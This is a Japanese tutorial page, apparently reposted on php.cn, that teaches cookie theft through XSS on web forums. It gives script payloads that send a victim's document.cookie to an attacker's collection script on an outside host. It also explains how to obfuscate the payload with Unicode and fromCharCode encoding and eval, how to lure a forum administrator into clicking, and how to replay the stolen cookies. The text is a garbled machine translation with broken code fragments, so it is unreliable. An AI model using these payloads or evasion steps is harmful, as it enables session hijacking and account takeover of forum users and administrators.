ホームページ > ウェブフロントエンド > jsチュートリアル > Cookie スプーフィングで JavaScript の実行を隠蔽する XSS 攻撃

Cookie スプーフィングで JavaScript の実行を隠蔽する XSS 攻撃

高洛峰
リリース: 2016-11-25 09:45:00
オリジナル
1451 人が閲覧しました

たとえば、XSS が可能な場所を見つけた場合:
<script>アラート (何があってもポップアップする)</script>

Cookie を盗むファイルを自分で入手します。

その目的は、私たちが設計したトラップを他の視聴者が閲覧できるようにすることです
<script>document.location=http://URL.com/cookie.php?cookie='+escape(document.cookie) &lt ; /script><br><br>実際、その方法についてはこれ以上説明する必要はありません。 。 <br><br>ここでは主に JavaScript の実行を非表示にする方法について説明します。 <br><br>XSS 脆弱性の EXP がリリースされるたび、またはそれを悪用するたびに、毎日 milw0rm.com にアクセスして EXP を確認することに慣れているかもしれません。 <br><br>でも、情報を Cookie に保存できないのはなぜですか? 。 <br><br>Magic や PHPBB などの大規模なフォーラムにはすべて XSS 脆弱性があります。 <br><br>これを与えました<br><script>document.location=http://URL.com/cookie.php?cookie='+escape(document.cookie) </script>

Javascriptが表示されます間違い。

外部の機密情報を Unicode でエンコードできます。

URL を指定します: http://www.mikezilla.com/exp0012.html

これがエンコード方法です:
<script>eval( location.href="http://www.php1.cn/"><br>上記が機能しない場合は、2 番目の方法を使用してください<br><br>JavaScript の eval 関数 fromCharCode<br><br>上記のように、一部の Web サイトは次の方法でエンコードできますunicode<br><br> たとえば、エンコードされた 104、116、116、112 は HTTP<br><br>フォーラムが PHPWind で使用される WYSIWYG エディタなどの他のエディタを使用している場合<br><br> http://url を直接入力すると確実に公開されます.com<br><br> 次に、エディタの形式に合わせてURLを変更します<br><br>例えば、COOKIEを盗むサイトは http://www.URL.com<br><br> とします<br>http:// www.url.com<br><br> もちろん、表示されている部分が表示されます 運営やクリックを騙す魅力的な情報に置き換えることもできます <br><br> ちょっとしたソーシャルエンジニアリングを使うだけです <br><br> 最初のアイデアが完成したので、実装してみましょう<br><br>ステップ 1: 管理者は私たちの構造を見て、彼をクリックしました<br><br>ステップ 2: Javascript が正常に実行されました<br><br>ステップ 3: Cookie を盗むために盗まれた COOKIE ファイルを作成しました<br><br> ステップ 4: 私たちは十分に愚かではありません。 URL に接続します。これはプレーン テキストであり、URL は Unicode でエンコードされています (ここでは暗号化されていると言うのが通例です) http://www.mikezilla.com/exp0012.html<br><br>ステップ 5: インターセプトされた Cookie情報はもちろん平文ではありません。FireFox Cookie Edit を使用するだけで済みます。COOKIE を <br> に置き換えるか、CookieEditor などの他のツールを使用しても問題ありません。個人的な提案: Cookie を盗むには、必ずしも を使用する必要はありません。たとえば、@hotmail.com","cookie Monster",$_REQUEST[cookie]);<br><br>?><br><html><br><script> document.location=http://www.URL.com/' ;</script>


それでは、貴重な情報を盗んで、Cookie を置き換えるだけです。

関連ラベル:
ソース:php.cn
このウェブサイトの声明
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。
最新の問題
人気のチュートリアル
詳細>
最新のダウンロード
詳細>
ウェブエフェクト
公式サイト
サイト素材
フロントエンドテンプレート